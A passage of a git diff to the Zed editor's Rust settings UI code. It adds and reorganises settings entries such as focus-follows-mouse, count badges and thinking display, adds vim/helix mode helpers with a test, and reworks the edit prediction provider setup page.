.status_bar + .as_ref()? + .show_active_file + .as_ref() + }, + write: |settings_content, value| { + settings_content + .status_bar + .get_or_insert_default() + .show_active_file = value; + }, + }), + metadata: None, + files: USER, + }), ] } - fn title_bar_section() -> [SettingsPageItem; 9] { + fn title_bar_section() -> [SettingsPageItem; 10] { [ SettingsPageItem::SectionHeader("Title Bar"), SettingsPageItem::SettingItem(SettingItem { @@ -3647,6 +3698,122 @@ fn window_and_layout_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::DynamicItem(DynamicItem { + discriminant: SettingItem { + files: USER, + title: "Button Layout", + description: + "(Linux only) choose how window control buttons are laid out in the titlebar.", + field: Box::new(SettingField { + json_path: Some("title_bar.button_layout$"), + pick: |settings_content| { + Some( + &dynamic_variants::()[settings_content + .title_bar + .as_ref()? + .button_layout + .as_ref()? + .discriminant() + as usize], + ) + }, + write: |settings_content, value| { + let Some(value) = value else { + settings_content + .title_bar + .get_or_insert_default() + .button_layout = None; + return; + }; + + let current_custom_layout = settings_content + .title_bar + .as_ref() + .and_then(|title_bar| title_bar.button_layout.as_ref()) + .and_then(|button_layout| match button_layout { + settings::WindowButtonLayoutContent::Custom(layout) => { + Some(layout.clone()) + } + _ => None, + }); + + let button_layout = match value { + settings::WindowButtonLayoutContentDiscriminants::PlatformDefault => { + settings::WindowButtonLayoutContent::PlatformDefault + } + settings::WindowButtonLayoutContentDiscriminants::Standard => { + settings::WindowButtonLayoutContent::Standard + } + settings::WindowButtonLayoutContentDiscriminants::Custom => { + settings::WindowButtonLayoutContent::Custom( + current_custom_layout.unwrap_or_else(|| { + "close:minimize,maximize".to_string() + }), + ) + } + }; + + settings_content + 
.title_bar + .get_or_insert_default() + .button_layout = Some(button_layout); + }, + }), + metadata: None, + }, + pick_discriminant: |settings_content| { + Some( + settings_content + .title_bar + .as_ref()? + .button_layout + .as_ref()? + .discriminant() as usize, + ) + }, + fields: dynamic_variants::() + .into_iter() + .map(|variant| match variant { + settings::WindowButtonLayoutContentDiscriminants::PlatformDefault => { + vec![] + } + settings::WindowButtonLayoutContentDiscriminants::Standard => vec![], + settings::WindowButtonLayoutContentDiscriminants::Custom => vec![ + SettingItem { + files: USER, + title: "Custom Button Layout", + description: + "GNOME-style layout string such as \"close:minimize,maximize\".", + field: Box::new(SettingField { + json_path: Some("title_bar.button_layout"), + pick: |settings_content| match settings_content + .title_bar + .as_ref()? + .button_layout + .as_ref()? + { + settings::WindowButtonLayoutContent::Custom(layout) => { + Some(layout) + } + _ => DEFAULT_EMPTY_STRING, + }, + write: |settings_content, value| { + settings_content + .title_bar + .get_or_insert_default() + .button_layout = value + .map(settings::WindowButtonLayoutContent::Custom); + }, + }), + metadata: Some(Box::new(SettingsFieldMetadata { + placeholder: Some("close:minimize,maximize"), + ..Default::default() + })), + }, + ], + }) + .collect(), + }), ] } @@ -4010,7 +4177,7 @@ fn window_and_layout_page() -> SettingsPage { ] } - fn layout_section() -> [SettingsPageItem; 4] { + fn layout_section() -> [SettingsPageItem; 6] { [ SettingsPageItem::SectionHeader("Layout"), SettingsPageItem::SettingItem(SettingItem { @@ -4074,6 +4241,52 @@ fn window_and_layout_page() -> SettingsPage { }), metadata: None, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Focus Follows Mouse", + description: "Whether to change focus to a pane when the mouse hovers over it.", + field: Box::new(SettingField { + json_path: Some("focus_follows_mouse.enabled"), + pick: 
|settings_content| { + settings_content + .workspace + .focus_follows_mouse + .as_ref() + .and_then(|s| s.enabled.as_ref()) + }, + write: |settings_content, value| { + settings_content + .workspace + .focus_follows_mouse + .get_or_insert_default() + .enabled = value; + }, + }), + metadata: None, + files: USER, + }), + SettingsPageItem::SettingItem(SettingItem { + title: "Focus Follows Mouse Debounce ms", + description: "Amount of time to wait before changing focus.", + field: Box::new(SettingField { + json_path: Some("focus_follows_mouse.debounce_ms"), + pick: |settings_content| { + settings_content + .workspace + .focus_follows_mouse + .as_ref() + .and_then(|s| s.debounce_ms.as_ref()) + }, + write: |settings_content, value| { + settings_content + .workspace + .focus_follows_mouse + .get_or_insert_default() + .debounce_ms = value; + }, + }), + metadata: None, + files: USER, + }), ] } @@ -4238,7 +4451,7 @@ fn window_and_layout_page() -> SettingsPage { } fn panels_page() -> SettingsPage { - fn project_panel_section() -> [SettingsPageItem; 22] { + fn project_panel_section() -> [SettingsPageItem; 28] { [ SettingsPageItem::SectionHeader("Project Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -4516,6 +4729,32 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Horizontal Scroll", + description: "Whether to allow horizontal scrolling in the project panel. When disabled, the view is always locked to the leftmost position and long file names are clipped.", + field: Box::new(SettingField { + json_path: Some("project_panel.scrollbar.horizontal_scroll"), + pick: |settings_content| { + settings_content + .project_panel + .as_ref()? + .scrollbar + .as_ref()? 
+ .horizontal_scroll + .as_ref() + }, + write: |settings_content, value| { + settings_content + .project_panel + .get_or_insert_default() + .scrollbar + .get_or_insert_default() + .horizontal_scroll = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Show Diagnostics", description: "Which files containing diagnostic errors/warnings to mark in the project panel.", @@ -4560,6 +4799,28 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Git Status Indicator", + description: "Show a git status indicator next to file names in the project panel.", + field: Box::new(SettingField { + json_path: Some("project_panel.git_status_indicator"), + pick: |settings_content| { + settings_content + .project_panel + .as_ref()? + .git_status_indicator + .as_ref() + }, + write: |settings_content, value| { + settings_content + .project_panel + .get_or_insert_default() + .git_status_indicator = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Sticky Scroll", description: "Whether to stick parent directories at top of the project panel.", @@ -4634,7 +4895,7 @@ fn panels_page() -> SettingsPage { title: "Hide Root", description: "Whether to hide the root entry when only one folder is open in the window.", field: Box::new(SettingField { - json_path: Some("project_panel.drag_and_drop"), + json_path: Some("project_panel.hide_root"), pick: |settings_content| { settings_content.project_panel.as_ref()?.hide_root.as_ref() }, @@ -4671,31 +4932,25 @@ fn panels_page() -> SettingsPage { files: USER, }), SettingsPageItem::SettingItem(SettingItem { - title: "Hidden Files", - description: "Globs to match files that will be considered \"hidden\" and can be hidden from the project panel.", - field: Box::new( - SettingField { - json_path: Some("worktree.hidden_files"), - pick: |settings_content| { - 
settings_content.project.worktree.hidden_files.as_ref() - }, - write: |settings_content, value| { - settings_content.project.worktree.hidden_files = value; - }, - } - .unimplemented(), - ), + title: "Sort Mode", + description: "Sort order for entries in the project panel.", + field: Box::new(SettingField { + json_path: Some("project_panel.sort_mode"), + pick: |settings_content| { + settings_content.project_panel.as_ref()?.sort_mode.as_ref() + }, + write: |settings_content, value| { + settings_content + .project_panel + .get_or_insert_default() + .sort_mode = value; + }, + }), metadata: None, files: USER, }), - ] - } - - fn auto_open_files_section() -> [SettingsPageItem; 5] { - [ - SettingsPageItem::SectionHeader("Auto Open Files"), SettingsPageItem::SettingItem(SettingItem { - title: "On Create", + title: "Auto Open Files On Create", description: "Whether to automatically open newly created files in the editor.", field: Box::new(SettingField { json_path: Some("project_panel.auto_open.on_create"), @@ -4721,7 +4976,7 @@ fn panels_page() -> SettingsPage { files: USER, }), SettingsPageItem::SettingItem(SettingItem { - title: "On Paste", + title: "Auto Open Files On Paste", description: "Whether to automatically open files after pasting or duplicating them.", field: Box::new(SettingField { json_path: Some("project_panel.auto_open.on_paste"), @@ -4747,7 +5002,7 @@ fn panels_page() -> SettingsPage { files: USER, }), SettingsPageItem::SettingItem(SettingItem { - title: "On Drop", + title: "Auto Open Files On Drop", description: "Whether to automatically open files dropped from external sources.", field: Box::new(SettingField { json_path: Some("project_panel.auto_open.on_drop"), @@ -4773,27 +5028,27 @@ fn panels_page() -> SettingsPage { files: USER, }), SettingsPageItem::SettingItem(SettingItem { - title: "Sort Mode", - description: "Sort order for entries in the project panel.", - field: Box::new(SettingField { - pick: |settings_content| { - 
settings_content.project_panel.as_ref()?.sort_mode.as_ref() - }, - write: |settings_content, value| { - settings_content - .project_panel - .get_or_insert_default() - .sort_mode = value; - }, - json_path: Some("project_panel.sort_mode"), - }), + title: "Hidden Files", + description: "Globs to match files that will be considered \"hidden\" and can be hidden from the project panel.", + field: Box::new( + SettingField { + json_path: Some("worktree.hidden_files"), + pick: |settings_content| { + settings_content.project.worktree.hidden_files.as_ref() + }, + write: |settings_content, value| { + settings_content.project.worktree.hidden_files = value; + }, + } + .unimplemented(), + ), metadata: None, files: USER, }), ] } - fn terminal_panel_section() -> [SettingsPageItem; 2] { + fn terminal_panel_section() -> [SettingsPageItem; 4] { [ SettingsPageItem::SectionHeader("Terminal Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -4809,6 +5064,41 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Terminal Panel Flexible Sizing", + description: "Whether the terminal panel should use flexible (proportional) sizing when docked to the left or right.", + field: Box::new(SettingField { + json_path: Some("terminal.flexible"), + pick: |settings_content| settings_content.terminal.as_ref()?.flexible.as_ref(), + write: |settings_content, value| { + settings_content.terminal.get_or_insert_default().flexible = value; + }, + }), + metadata: None, + files: USER, + }), + SettingsPageItem::SettingItem(SettingItem { + title: "Show Count Badge", + description: "Show a badge on the terminal panel icon with the count of open terminals.", + field: Box::new(SettingField { + json_path: Some("terminal.show_count_badge"), + pick: |settings_content| { + settings_content + .terminal + .as_ref()? 
+ .show_count_badge + .as_ref() + }, + write: |settings_content, value| { + settings_content + .terminal + .get_or_insert_default() + .show_count_badge = value; + }, + }), + metadata: None, + files: USER, + }), ] } @@ -5021,7 +5311,7 @@ fn panels_page() -> SettingsPage { ] } - fn git_panel_section() -> [SettingsPageItem; 11] { + fn git_panel_section() -> [SettingsPageItem; 14] { [ SettingsPageItem::SectionHeader("Git Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -5163,6 +5453,42 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "File Icons", + description: "Show file icons next to the Git status icon.", + field: Box::new(SettingField { + json_path: Some("git_panel.file_icons"), + pick: |settings_content| { + settings_content.git_panel.as_ref()?.file_icons.as_ref() + }, + write: |settings_content, value| { + settings_content + .git_panel + .get_or_insert_default() + .file_icons = value; + }, + }), + metadata: None, + files: USER, + }), + SettingsPageItem::SettingItem(SettingItem { + title: "Folder Icons", + description: "Whether to show folder icons or chevrons for directories in the git panel.", + field: Box::new(SettingField { + json_path: Some("git_panel.folder_icons"), + pick: |settings_content| { + settings_content.git_panel.as_ref()?.folder_icons.as_ref() + }, + write: |settings_content, value| { + settings_content + .git_panel + .get_or_insert_default() + .folder_icons = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Diff Stats", description: "Whether to show the addition/deletion change count next to each file in the Git panel.", @@ -5181,6 +5507,28 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Show Count Badge", + description: "Whether to show a badge on the git panel icon with the count of uncommitted changes.", + field: 
Box::new(SettingField { + json_path: Some("git_panel.show_count_badge"), + pick: |settings_content| { + settings_content + .git_panel + .as_ref()? + .show_count_badge + .as_ref() + }, + write: |settings_content, value| { + settings_content + .git_panel + .get_or_insert_default() + .show_count_badge = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Scroll Bar", description: "How and when the scrollbar should be displayed.", @@ -5231,7 +5579,7 @@ fn panels_page() -> SettingsPage { ] } - fn notification_panel_section() -> [SettingsPageItem; 4] { + fn notification_panel_section() -> [SettingsPageItem; 5] { [ SettingsPageItem::SectionHeader("Notification Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -5296,6 +5644,28 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Show Count Badge", + description: "Show a badge on the notification panel icon with the count of unread notifications.", + field: Box::new(SettingField { + json_path: Some("notification_panel.show_count_badge"), + pick: |settings_content| { + settings_content + .notification_panel + .as_ref()? 
+ .show_count_badge + .as_ref() + }, + write: |settings_content, value| { + settings_content + .notification_panel + .get_or_insert_default() + .show_count_badge = value; + }, + }), + metadata: None, + files: USER, + }), ] } @@ -5367,7 +5737,7 @@ fn panels_page() -> SettingsPage { ] } - fn agent_panel_section() -> [SettingsPageItem; 5] { + fn agent_panel_section() -> [SettingsPageItem; 6] { [ SettingsPageItem::SectionHeader("Agent Panel"), SettingsPageItem::SettingItem(SettingItem { @@ -5396,6 +5766,19 @@ fn panels_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Agent Panel Flexible Sizing", + description: "Whether the agent panel should use flexible (proportional) sizing when docked to the left or right.", + field: Box::new(SettingField { + json_path: Some("agent.flexible"), + pick: |settings_content| settings_content.agent.as_ref()?.flexible.as_ref(), + write: |settings_content, value| { + settings_content.agent.get_or_insert_default().flexible = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Agent Panel Default Width", description: "Default width when the agent panel is docked to the left or right.", @@ -5436,7 +5819,6 @@ fn panels_page() -> SettingsPage { title: "Panels", items: concat_sections![ project_panel_section(), - auto_open_files_section(), terminal_panel_section(), outline_panel_section(), git_panel_section(), @@ -6793,101 +7175,8 @@ fn collaboration_page() -> SettingsPage { ] } - fn experimental_section() -> [SettingsPageItem; 9] { + fn audio_settings() -> [SettingsPageItem; 3] { [ - SettingsPageItem::SectionHeader("Experimental"), - SettingsPageItem::SettingItem(SettingItem { - title: "Rodio Audio", - description: "Opt into the new audio system.", - field: Box::new(SettingField { - json_path: Some("audio.experimental.rodio_audio"), - pick: |settings_content| settings_content.audio.as_ref()?.rodio_audio.as_ref(), - write: 
|settings_content, value| { - settings_content.audio.get_or_insert_default().rodio_audio = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Auto Microphone Volume", - description: "Automatically adjust microphone volume (requires rodio audio).", - field: Box::new(SettingField { - json_path: Some("audio.experimental.auto_microphone_volume"), - pick: |settings_content| { - settings_content - .audio - .as_ref()? - .auto_microphone_volume - .as_ref() - }, - write: |settings_content, value| { - settings_content - .audio - .get_or_insert_default() - .auto_microphone_volume = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Auto Speaker Volume", - description: "Automatically adjust volume of other call members (requires rodio audio).", - field: Box::new(SettingField { - json_path: Some("audio.experimental.auto_speaker_volume"), - pick: |settings_content| { - settings_content - .audio - .as_ref()? 
- .auto_speaker_volume - .as_ref() - }, - write: |settings_content, value| { - settings_content - .audio - .get_or_insert_default() - .auto_speaker_volume = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Denoise", - description: "Remove background noises (requires rodio audio).", - field: Box::new(SettingField { - json_path: Some("audio.experimental.denoise"), - pick: |settings_content| settings_content.audio.as_ref()?.denoise.as_ref(), - write: |settings_content, value| { - settings_content.audio.get_or_insert_default().denoise = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Legacy Audio Compatible", - description: "Use audio parameters compatible with previous versions (requires rodio audio).", - field: Box::new(SettingField { - json_path: Some("audio.experimental.legacy_audio_compatible"), - pick: |settings_content| { - settings_content - .audio - .as_ref()? 
- .legacy_audio_compatible - .as_ref() - }, - write: |settings_content, value| { - settings_content - .audio - .get_or_insert_default() - .legacy_audio_compatible = value; - }, - }), - metadata: None, - files: USER, - }), SettingsPageItem::ActionLink(ActionLink { title: "Test Audio".into(), description: Some("Test your microphone and speaker setup".into()), @@ -6948,11 +7237,11 @@ fn collaboration_page() -> SettingsPage { SettingsPage { title: "Collaboration", - items: concat_sections![calls_section(), experimental_section()], + items: concat_sections![calls_section(), audio_settings()], } } -fn ai_page() -> SettingsPage { +fn ai_page(cx: &App) -> SettingsPage { fn general_section() -> [SettingsPageItem; 2] { [ SettingsPageItem::SectionHeader("General"), @@ -6972,8 +7261,8 @@ fn ai_page() -> SettingsPage { ] } - fn agent_configuration_section() -> [SettingsPageItem; 12] { - [ + fn agent_configuration_section(cx: &App) -> Box<[SettingsPageItem]> { + let mut items = vec![ SettingsPageItem::SectionHeader("Agent Configuration"), SettingsPageItem::SubPageLink(SubPageLink { title: "Tool Permissions".into(), @@ -6984,6 +7273,34 @@ fn ai_page() -> SettingsPage { files: USER, render: render_tool_permissions_setup_page, }), + ]; + + if cx.has_flag::() { + items.push(SettingsPageItem::SettingItem(SettingItem { + title: "New Thread Location", + description: "Whether to start a new thread in the current local project or in a new Git worktree.", + field: Box::new(SettingField { + json_path: Some("agent.new_thread_location"), + pick: |settings_content| { + settings_content + .agent + .as_ref()? 
+ .new_thread_location + .as_ref() + }, + write: |settings_content, value| { + settings_content + .agent + .get_or_insert_default() + .new_thread_location = value; + }, + }), + metadata: None, + files: USER, + })); + } + + items.extend([ SettingsPageItem::SettingItem(SettingItem { title: "Single File Review", description: "When enabled, agent edits will also be displayed in single-file buffers for review.", @@ -7044,7 +7361,7 @@ fn ai_page() -> SettingsPage { }), SettingsPageItem::SettingItem(SettingItem { title: "Play Sound When Agent Done", - description: "Whether to play a sound when the agent has either completed its response, or needs user input.", + description: "When to play a sound when the agent has either completed its response, or needs user input.", field: Box::new(SettingField { json_path: Some("agent.play_sound_when_agent_done"), pick: |settings_content| { @@ -7104,6 +7421,28 @@ fn ai_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Thinking Display", + description: "How thinking blocks should be displayed by default. 'Auto' fully expands during streaming, then auto-collapses when done. 'Preview' auto-expands with a height constraint during streaming. 'Always Expanded' shows full content. 'Always Collapsed' keeps them collapsed.", + field: Box::new(SettingField { + json_path: Some("agent.thinking_display"), + pick: |settings_content| { + settings_content + .agent + .as_ref()? + .thinking_display + .as_ref() + }, + write: |settings_content, value| { + settings_content + .agent + .get_or_insert_default() + .thinking_display = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Cancel Generation On Terminal Stop", description: "Whether clicking the stop button on a running terminal tool should also cancel the agent's generation. 
Note that this only applies to the stop button, not to ctrl+c inside the terminal.", @@ -7188,7 +7527,27 @@ fn ai_page() -> SettingsPage { metadata: None, files: USER, }), - ] + SettingsPageItem::SettingItem(SettingItem { + title: "Show Merge Conflict Indicator", + description: "Whether to show the merge conflict indicator in the status bar that offers to resolve conflicts using the agent.", + field: Box::new(SettingField { + json_path: Some("agent.show_merge_conflict_indicator"), + pick: |settings_content| { + settings_content.agent.as_ref()?.show_merge_conflict_indicator.as_ref() + }, + write: |settings_content, value| { + settings_content + .agent + .get_or_insert_default() + .show_merge_conflict_indicator = value; + }, + }), + metadata: None, + files: USER, + }), + ]); + + items.into_boxed_slice() } fn context_servers_section() -> [SettingsPageItem; 2] { @@ -7212,68 +7571,40 @@ fn ai_page() -> SettingsPage { ] } - fn edit_prediction_display_sub_section() -> [SettingsPageItem; 2] { - [ - SettingsPageItem::SettingItem(SettingItem { - title: "Display Mode", - description: "When to show edit predictions previews in buffer. The eager mode displays them inline, while the subtle mode displays them only when holding a modifier key.", - field: Box::new(SettingField { - json_path: Some("edit_prediction.display_mode"), - pick: |settings_content| { - settings_content - .project - .all_languages - .edit_predictions - .as_ref()? 
- .mode - .as_ref() - }, - write: |settings_content, value| { - settings_content - .project - .all_languages - .edit_predictions - .get_or_insert_default() - .mode = value; - }, - }), - metadata: None, - files: USER, - }), - SettingsPageItem::SettingItem(SettingItem { - title: "Display In Text Threads", - description: "Whether edit predictions are enabled when editing text threads in the agent panel.", - field: Box::new(SettingField { - json_path: Some("edit_prediction.in_text_threads"), - pick: |settings_content| { - settings_content - .project - .all_languages - .edit_predictions - .as_ref()? - .enabled_in_text_threads - .as_ref() - }, - write: |settings_content, value| { - settings_content - .project - .all_languages - .edit_predictions - .get_or_insert_default() - .enabled_in_text_threads = value; - }, - }), - metadata: None, - files: USER, + fn edit_prediction_display_sub_section() -> [SettingsPageItem; 1] { + [SettingsPageItem::SettingItem(SettingItem { + title: "Display Mode", + description: "When to show edit predictions previews in buffer. The eager mode displays them inline, while the subtle mode displays them only when holding a modifier key.", + field: Box::new(SettingField { + json_path: Some("edit_prediction.display_mode"), + pick: |settings_content| { + settings_content + .project + .all_languages + .edit_predictions + .as_ref()? 
+ .mode + .as_ref() + }, + write: |settings_content, value| { + settings_content + .project + .all_languages + .edit_predictions + .get_or_insert_default() + .mode = value; + }, }), - ] + metadata: None, + files: USER, + })] } SettingsPage { title: "AI", items: concat_sections![ general_section(), - agent_configuration_section(), + agent_configuration_section(cx), context_servers_section(), edit_prediction_language_settings_section(), edit_prediction_display_sub_section() @@ -7405,7 +7736,7 @@ fn language_settings_data() -> Box<[SettingsPageItem]> { }), SettingsPageItem::SettingItem(SettingItem { title: "Auto Indent", - description: "Whether indentation should be adjusted based on the context whilst typing.", + description: "Controls automatic indentation behavior when typing.", field: Box::new(SettingField { json_path: Some("languages.$(language).auto_indent"), pick: |settings_content| { @@ -8367,7 +8698,7 @@ fn language_settings_data() -> Box<[SettingsPageItem]> { ] } - fn miscellaneous_section() -> [SettingsPageItem; 6] { + fn miscellaneous_section() -> [SettingsPageItem; 7] { [ SettingsPageItem::SectionHeader("Miscellaneous"), SettingsPageItem::SettingItem(SettingItem { @@ -8466,6 +8797,19 @@ fn language_settings_data() -> Box<[SettingsPageItem]> { metadata: None, files: USER | PROJECT, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Vim/Emacs Modeline Support", + description: "Number of lines to search for modelines (set to 0 to disable).", + field: Box::new(SettingField { + json_path: Some("modeline_lines"), + pick: |settings_content| settings_content.modeline_lines.as_ref(), + write: |settings_content, value| { + settings_content.modeline_lines = value; + }, + }), + metadata: None, + files: USER | PROJECT, + }), ] } @@ -9012,3 +9356,67 @@ where { <::Discriminant as strum::VariantArray>::VARIANTS } + +/// Updates the `vim_mode` setting, disabling `helix_mode` if present and +/// `vim_mode` is being enabled. 
+fn write_vim_mode(settings: &mut SettingsContent, value: Option) { + if value == Some(true) && settings.helix_mode == Some(true) { + settings.helix_mode = Some(false); + } + settings.vim_mode = value; +} + +/// Updates the `helix_mode` setting, disabling `vim_mode` if present and +/// `helix_mode` is being enabled. +fn write_helix_mode(settings: &mut SettingsContent, value: Option) { + if value == Some(true) && settings.vim_mode == Some(true) { + settings.vim_mode = Some(false); + } + settings.helix_mode = value; +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_write_vim_helix_mode() { + // Enabling vim mode while `vim_mode` and `helix_mode` are not yet set + // should only update the `vim_mode` setting. + let mut settings = SettingsContent::default(); + write_vim_mode(&mut settings, Some(true)); + assert_eq!(settings.vim_mode, Some(true)); + assert_eq!(settings.helix_mode, None); + + // Enabling helix mode while `vim_mode` and `helix_mode` are not yet set + // should only update the `helix_mode` setting. + let mut settings = SettingsContent::default(); + write_helix_mode(&mut settings, Some(true)); + assert_eq!(settings.helix_mode, Some(true)); + assert_eq!(settings.vim_mode, None); + + // Disabling helix mode should only touch `helix_mode` setting when + // `vim_mode` is not set. + write_helix_mode(&mut settings, Some(false)); + assert_eq!(settings.helix_mode, Some(false)); + assert_eq!(settings.vim_mode, None); + + // Enabling vim mode should update `vim_mode` but leave `helix_mode` + // untouched. + write_vim_mode(&mut settings, Some(true)); + assert_eq!(settings.vim_mode, Some(true)); + assert_eq!(settings.helix_mode, Some(false)); + + // Enabling helix mode should update `helix_mode` and disable + // `vim_mode`. + write_helix_mode(&mut settings, Some(true)); + assert_eq!(settings.helix_mode, Some(true)); + assert_eq!(settings.vim_mode, Some(false)); + + // Enabling vim mode should update `vim_mode` and disable + // `helix_mode`. 
+ write_vim_mode(&mut settings, Some(true)); + assert_eq!(settings.vim_mode, Some(true)); + assert_eq!(settings.helix_mode, Some(false)); + } +} diff --git a/crates/settings_ui/src/pages/audio_test_window.rs b/crates/settings_ui/src/pages/audio_test_window.rs index 63bd1d14ffb3ad9c7d1b2d176d9de58aa762ec25..d50d017d7abde836fb2945baf2f1434472281005 100644 --- a/crates/settings_ui/src/pages/audio_test_window.rs +++ b/crates/settings_ui/src/pages/audio_test_window.rs @@ -88,7 +88,7 @@ fn start_test_playback( } }; - let Ok(output) = audio::open_output_stream(output_device_id) else { + let Ok(output) = audio::open_test_output(output_device_id) else { log::error!("Could not open output device for audio test"); return; }; diff --git a/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs b/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs index 338fe4de14f1f7e9060fafe865253f09f0bdc481..a2a457d33eb0788ff0bed981ce5666423890f05a 100644 --- a/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs +++ b/crates/settings_ui/src/pages/edit_prediction_provider_setup.rs @@ -2,7 +2,7 @@ use codestral::{CODESTRAL_API_URL, codestral_api_key_state, codestral_api_url}; use edit_prediction::{ ApiKeyState, mercury::{MERCURY_CREDENTIALS_URL, mercury_api_token}, - sweep_ai::{SWEEP_CREDENTIALS_URL, sweep_api_token}, + open_ai_compatible::{open_ai_compatible_api_token, open_ai_compatible_api_url}, }; use edit_prediction_ui::{get_available_providers, set_completion_provider}; use gpui::{Entity, ScrollHandle, prelude::*}; @@ -33,7 +33,9 @@ pub(crate) fn render_edit_prediction_setup_page( render_api_key_provider( IconName::Inception, "Mercury", - "https://platform.inceptionlabs.ai/dashboard/api-keys".into(), + ApiKeyDocs::Link { + dashboard_url: "https://platform.inceptionlabs.ai/dashboard/api-keys".into(), + }, mercury_api_token(cx), |_cx| MERCURY_CREDENTIALS_URL, None, @@ -44,15 +46,17 @@ pub(crate) fn render_edit_prediction_setup_page( ), Some( 
render_api_key_provider( - IconName::SweepAi, - "Sweep", - "https://app.sweep.dev/".into(), - sweep_api_token(cx), - |_cx| SWEEP_CREDENTIALS_URL, + IconName::AiMistral, + "Codestral", + ApiKeyDocs::Link { + dashboard_url: "https://console.mistral.ai/codestral".into(), + }, + codestral_api_key_state(cx), + |cx| codestral_api_url(cx), Some( settings_window .render_sub_page_items_section( - sweep_settings().iter().enumerate(), + codestral_settings().iter().enumerate(), true, window, cx, @@ -64,17 +68,20 @@ pub(crate) fn render_edit_prediction_setup_page( ) .into_any_element(), ), + Some(render_ollama_provider(settings_window, window, cx).into_any_element()), Some( render_api_key_provider( - IconName::AiMistral, - "Codestral", - "https://console.mistral.ai/codestral".into(), - codestral_api_key_state(cx), - |cx| codestral_api_url(cx), + IconName::AiOpenAiCompat, + "OpenAI Compatible API", + ApiKeyDocs::Custom { + message: "The API key sent as Authorization: Bearer {key}.".into(), + }, + open_ai_compatible_api_token(cx), + |cx| open_ai_compatible_api_url(cx), Some( settings_window .render_sub_page_items_section( - codestral_settings().iter().enumerate(), + open_ai_compatible_settings().iter().enumerate(), true, window, cx, @@ -86,8 +93,6 @@ pub(crate) fn render_edit_prediction_setup_page( ) .into_any_element(), ), - Some(render_ollama_provider(settings_window, window, cx).into_any_element()), - Some(render_open_ai_compatible_provider(settings_window, window, cx).into_any_element()), ]; div() @@ -141,10 +146,12 @@ fn render_provider_dropdown(window: &mut Window, cx: &mut App) -> AnyElement { h_flex() .pt_2p5() .w_full() + .min_w_0() .justify_between() .child( v_flex() .w_full() + .min_w_0() .max_w_1_2() .child(Label::new("Provider")) .child( @@ -162,10 +169,15 @@ fn render_provider_dropdown(window: &mut Window, cx: &mut App) -> AnyElement { .into_any_element() } +enum ApiKeyDocs { + Link { dashboard_url: SharedString }, + Custom { message: SharedString }, +} + fn 
render_api_key_provider( icon: IconName, title: &'static str, - link: SharedString, + docs: ApiKeyDocs, api_key_state: Entity, current_url: fn(&mut App) -> SharedString, additional_fields: Option, @@ -173,9 +185,15 @@ fn render_api_key_provider( cx: &mut Context, ) -> impl IntoElement { let weak_page = cx.weak_entity(); + let credentials_provider = zed_credentials_provider::global(cx); _ = window.use_keyed_state(current_url(cx), cx, |_, cx| { let task = api_key_state.update(cx, |key_state, cx| { - key_state.load_if_needed(current_url(cx), |state| state, cx) + key_state.load_if_needed( + current_url(cx), + |state| state, + credentials_provider.clone(), + cx, + ) }); cx.spawn(async move |_, cx| { task.await.ok(); @@ -196,10 +214,17 @@ fn render_api_key_provider( }); let write_key = move |api_key: Option, cx: &mut App| { + let credentials_provider = zed_credentials_provider::global(cx); api_key_state .update(cx, |key_state, cx| { let url = current_url(cx); - key_state.store(url, api_key, |key_state| key_state, cx) + key_state.store( + url, + api_key, + |key_state| key_state, + credentials_provider, + cx, + ) }) .detach_and_log_err(cx); }; @@ -209,25 +234,34 @@ fn render_api_key_provider( .icon(icon) .no_padding(true); let button_link_label = format!("{} dashboard", title); - let description = h_flex() - .min_w_0() - .gap_0p5() - .child( - Label::new("Visit the") - .size(LabelSize::Small) - .color(Color::Muted), - ) - .child( - ButtonLink::new(button_link_label, link) - .no_icon(true) - .label_size(LabelSize::Small) - .label_color(Color::Muted), - ) - .child( - Label::new("to generate an API key.") + let description = match docs { + ApiKeyDocs::Custom { message } => div().min_w_0().w_full().child( + Label::new(message) .size(LabelSize::Small) .color(Color::Muted), - ); + ), + ApiKeyDocs::Link { dashboard_url } => h_flex() + .w_full() + .min_w_0() + .flex_wrap() + .gap_0p5() + .child( + Label::new("Visit the") + .size(LabelSize::Small) + .color(Color::Muted), + ) + 
